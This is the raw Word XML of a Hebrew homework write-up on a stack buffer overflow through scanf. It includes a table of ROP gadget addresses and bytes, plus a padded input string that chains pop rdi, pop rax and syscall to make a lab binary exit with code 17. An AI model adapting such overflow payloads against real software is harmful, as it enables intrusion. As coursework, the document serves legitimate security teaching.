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F58" w14:textId="6342D146" w:rsidR="00622F52" w:rsidRDefault="00215698" w:rsidP="00215698">
      <w:pPr>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>תרגיל בית 3</w:t>
      </w:r>
      <w:r w:rsidR="001C01FE">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C01FE">
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="001C01FE">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> חלק ב'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA4BAB" w14:textId="6FF31021" w:rsidR="001C01FE" w:rsidRDefault="00CC5EFC" w:rsidP="001C01F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בעיה בקריאה לפונקציה </w:t>
      </w:r>
      <w:r>
        <w:t>scanf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> היא שהקלט אותו מכניס המשתמש יכול להיות גדול מגדול ה-</w:t>
      </w:r>
      <w:r w:rsidR="0012592A">
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="0012592A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובכך לדרוס ערכים קודמים במחסנית בעת כתיבתו אליה</w:t>
      </w:r>
      <w:r w:rsidR="009E1E18">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (שכן קריאה מתבצעת לכתובת זיכרון</w:t>
      </w:r>
      <w:r w:rsidR="005E6B2B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> והשימוש הסטנדרטי הוא במחסנית), דבר שעלול להוביל להתנהגות בלתי מוגדרת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF1EED" w14:textId="7260995A" w:rsidR="0039293A" w:rsidRDefault="00C429D4" w:rsidP="0039293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כתובת תהיה ערך </w:t>
      </w:r>
      <w:r w:rsidR="00A44962">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה-</w:t>
      </w:r>
      <w:r w:rsidR="00A44962">
        <w:t>ascii</w:t>
      </w:r>
      <w:r w:rsidR="00996911">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של התווים "</w:t>
      </w:r>
      <w:r w:rsidR="00996911">
        <w:t>mMnNoOpP</w:t>
      </w:r>
      <w:r w:rsidR="00996911">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">", כלומר, </w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3" w:rsidRPr="00A535E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x50704f6f4e6e4d6d</w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA0024">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E81CA3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בסדר הפוך כי הכתיבה למחסנית נעשית מלמטה למעלה</w:t>
      </w:r>
      <w:r w:rsidR="00A535E6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וזה מפני שמכיוון שגודל ה-</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="0049091A">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המוקצה על המחסנית יהיה </w:t>
      </w:r>
      <w:r w:rsidR="00D646A2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">24 בייטים לפני </w:t>
      </w:r>
      <w:r w:rsidR="00B7665E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מה שמוקצה על ב-</w:t>
      </w:r>
      <w:r w:rsidR="00B7665E">
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="009F75EC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>. לכן 24 הבייטים הראשונים ישמרו על מקומות אלה והשמונה שיבואו אחרים ידרסו את הערך אליו אמורה התוכנית לחזור.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="7741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3F7A" w14:paraId="61D1598F" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E5290D" w14:textId="619981F4" w:rsidR="00D73F7A" w:rsidRPr="00E62A92" w:rsidRDefault="00397798" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Hlk105452135"/>
            <w:r w:rsidRPr="00E62A92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2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6264AFC3" w14:textId="35BFFA8A" w:rsidR="00D73F7A" w:rsidRPr="00E62A92" w:rsidRDefault="00397798" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr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קידוד</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB7B616" w14:textId="5EEB8028" w:rsidR="00D73F7A" w:rsidRPr="00E62A92" w:rsidRDefault="00397798" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr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פקודות</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D73F7A" w14:paraId="0DCB5B9B" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3765AE8C" w14:textId="021DBDAD" w:rsidR="00D73F7A" w:rsidRDefault="00E62A92" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x401d13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33187EEA" w14:textId="77777777" w:rsidR="006236FD" w:rsidRDefault="00E62A92" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5f </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E60467" w14:textId="157E8DF4" w:rsidR="00D73F7A" w:rsidRDefault="00E62A92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AE560E3" w14:textId="77777777" w:rsidR="00E62A92" w:rsidRDefault="00E62A92" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">pop %rdi </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D43D190" w14:textId="6FF87D21" w:rsidR="00D73F7A" w:rsidRDefault="00E62A92" w:rsidP="00235D05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D73F7A" w14:paraId="7D2B76C0" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D85F810" w14:textId="7EF8C2E1" w:rsidR="00D73F7A" w:rsidRDefault="00B27E91" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x</w:t>
            </w:r>
            <w:r w:rsidR="000D407D">
              <w:t>400e2c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7655C816" w14:textId="5082D710" w:rsidR="00D73F7A" w:rsidRDefault="00FC53DC" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>58</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278A64D7" w14:textId="7CB3B6F3" w:rsidR="006236FD" w:rsidRDefault="006236FD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0CAD07A4" w14:textId="24F750C2" w:rsidR="00E62A92" w:rsidRDefault="006236FD" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="00E62A92">
              <w:t xml:space="preserve">op %rax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034B5C95" w14:textId="7ED35691" w:rsidR="00D73F7A" w:rsidRDefault="00E62A92" w:rsidP="00235D05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D73F7A" w14:paraId="584BC910" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07778D8E" w14:textId="6079DD7D" w:rsidR="00D73F7A" w:rsidRDefault="009407BB" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x</w:t>
            </w:r>
            <w:r w:rsidR="0084530B">
              <w:t>40114f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="107E3710" w14:textId="1344135A" w:rsidR="00D73F7A" w:rsidRDefault="00A70306" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0f 05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5513164F" w14:textId="3122C22A" w:rsidR="00D73F7A" w:rsidRDefault="00E62A92" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>syscall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D73F7A" w14:paraId="5A0403EE" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E6D4805" w14:textId="6D099360" w:rsidR="00D73F7A" w:rsidRDefault="009208E9" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x401d11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24264F71" w14:textId="497E447E" w:rsidR="00D73F7A" w:rsidRDefault="000C7CEC" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACB959B" w14:textId="6305AAD8" w:rsidR="00E30167" w:rsidRDefault="00E57563" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>41 5f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7170E684" w14:textId="708B0F7B" w:rsidR="00E30167" w:rsidRDefault="00E30167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301216CC" w14:textId="77777777" w:rsidR="00D73F7A" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>pop %rsi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D57431A" w14:textId="77777777" w:rsidR="007E0534" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">pop %r15 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13485C27" w14:textId="56B9B4BB" w:rsidR="007E0534" w:rsidRDefault="007E0534" w:rsidP="00235D05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D73F7A" w14:paraId="345ED7EC" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6717B167" w14:textId="1ECB04AF" w:rsidR="00D73F7A" w:rsidRDefault="0042629C" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x400624</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C98603" w14:textId="77777777" w:rsidR="00D73F7A" w:rsidRDefault="00B5709B" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>55</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EBF5068" w14:textId="1D6BDF2B" w:rsidR="00126B4F" w:rsidRDefault="008E30E7" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidR="006B65A9">
              <w:t xml:space="preserve">f 20 </w:t>
            </w:r>
            <w:r>
              <w:t>2e 60 00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1715E3B6" w14:textId="16C13FF5" w:rsidR="00C21213" w:rsidRDefault="00703E95" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>48 89 e5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FDA47F" w14:textId="66F2B162" w:rsidR="00703E95" w:rsidRDefault="008E30E7" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ff d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699944B2" w14:textId="77777777" w:rsidR="00D73F7A" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>push %rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016FD007" w14:textId="77777777" w:rsidR="007E0534" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>mov $0x602e20, %edi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48643577" w14:textId="77777777" w:rsidR="007E0534" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>mov %rsp, %rbp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279C5B14" w14:textId="3C81D35D" w:rsidR="007E0534" w:rsidRDefault="007E0534" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>call *%rax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D73F7A" w14:paraId="125CF20A" w14:textId="77777777" w:rsidTr="00235D05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="358E416A" w14:textId="4E163A89" w:rsidR="00D73F7A" w:rsidRDefault="00AC5299" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>0x4008bc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55F66CD1" w14:textId="6A5CC6DC" w:rsidR="00D73F7A" w:rsidRDefault="001B17A2" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4c 01 ff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D7060B1" w14:textId="534DC368" w:rsidR="00E30167" w:rsidRDefault="00E30167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B20BB07" w14:textId="77777777" w:rsidR="00397798" w:rsidRDefault="00397798" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>add %r15, %rdi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3A3054" w14:textId="74458C35" w:rsidR="00D73F7A" w:rsidRDefault="00397798" w:rsidP="00235D05">
            <w:pPr>
              <w:bidi/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="5C061846" w14:textId="571CF427" w:rsidR="008D68C7" w:rsidRDefault="00670D8E" w:rsidP="008D68C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טבלה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A990B97" w14:textId="198D7829" w:rsidR="00670D8E" w:rsidRDefault="00E961A0" w:rsidP="00670D8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עת הרצת התוכנית, נכניס לסיסמה את המחרוזת הבאה</w:t>
      </w:r>
      <w:r w:rsidR="00875372">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7B864" w14:textId="44B65B30" w:rsidR="00BD19AD" w:rsidRDefault="00703656" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aaaaaaaaaaaaaaa</w:t>
      </w:r>
      <w:r w:rsidR="00DC2445">
        <w:t>\0x00\x00\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD9651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13\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B6F1A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11\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3C9CF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2c\x0e</w:t>
      </w:r>
      <w:r w:rsidR="003D775E">
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA01918" w14:textId="77777777" w:rsidR="00BD19AD" w:rsidRDefault="003D775E" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x3c\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63478307" w14:textId="4CF1FDBD" w:rsidR="00703656" w:rsidRDefault="003D775E" w:rsidP="00BD19AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x4f\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D7DBD" w14:textId="1E95A332" w:rsidR="002A62A8" w:rsidRDefault="002A62A8" w:rsidP="002A62A8">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">רעיון: נרצה לשנות את ערך </w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות 17, את ערך </w:t>
      </w:r>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל- 60 ואז לקרוא ל-</w:t>
      </w:r>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שאנו יודעים באיזה כתובת הוא בזיכרון מהטבלה ובכך נשיג את המטרה הכוללת.</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78B344" w14:textId="65BB406B" w:rsidR="00A96380" w:rsidRDefault="00A96380" w:rsidP="002F5B87">
      <w:pPr>
        <w:bidi/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>צעדים</w:t>
      </w:r>
      <w:r w:rsidR="002F5B87">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נכניס למחסנית בעת קריאת הסיסמה את הדברים כך שיתקיימו הבאים:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF064B" w14:textId="5BE9C57C" w:rsidR="007C7A92" w:rsidRDefault="007C7A92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כנסת 24 תווים ראשונים כלשהם שידרסו את הערכים על המחסנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B0C65" w14:textId="26ABE5B3" w:rsidR="00A96380" w:rsidRDefault="007C7A92" w:rsidP="007C7A92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הכנסת הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כך ש</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נקפוץ אחרי קריאת הסיסמה לכתובת</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שם בעת ביצוע </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:t>pop %rdi</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נעדכן את </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:t>rdi</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות </w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:t>0x11=17</w:t>
      </w:r>
      <w:r w:rsidR="00A96380">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABC0CA" w14:textId="3F558F16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נקפוץ ב-</w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שבא אחרי הפקודה הקודמת לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F0C3E" w14:textId="4C5D854A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בעת ביצוע פקודת </w:t>
      </w:r>
      <w:r>
        <w:t>pop %rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נעדכן את ערכו להיות 60=</w:t>
      </w:r>
      <w:r>
        <w:t>0x3c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EB72D" w14:textId="0BB5F3C3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נקפוץ ב-</w:t>
      </w:r>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x40114f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונבצע את הקריאה ל-</w:t>
      </w:r>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E038876" w14:textId="7EFA17E8" w:rsidR="00FA42CF" w:rsidRDefault="003100FE" w:rsidP="00FA42CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r w:rsidRPr="003100FE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1CEEB789" wp14:editId="0CDC5BEE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>808355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3718560" cy="818515"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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65">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>סיום התוכנית.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050BF301" w14:textId="04755D86" w:rsidR="002F5B87" w:rsidRDefault="002F5B87" w:rsidP="002F5B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
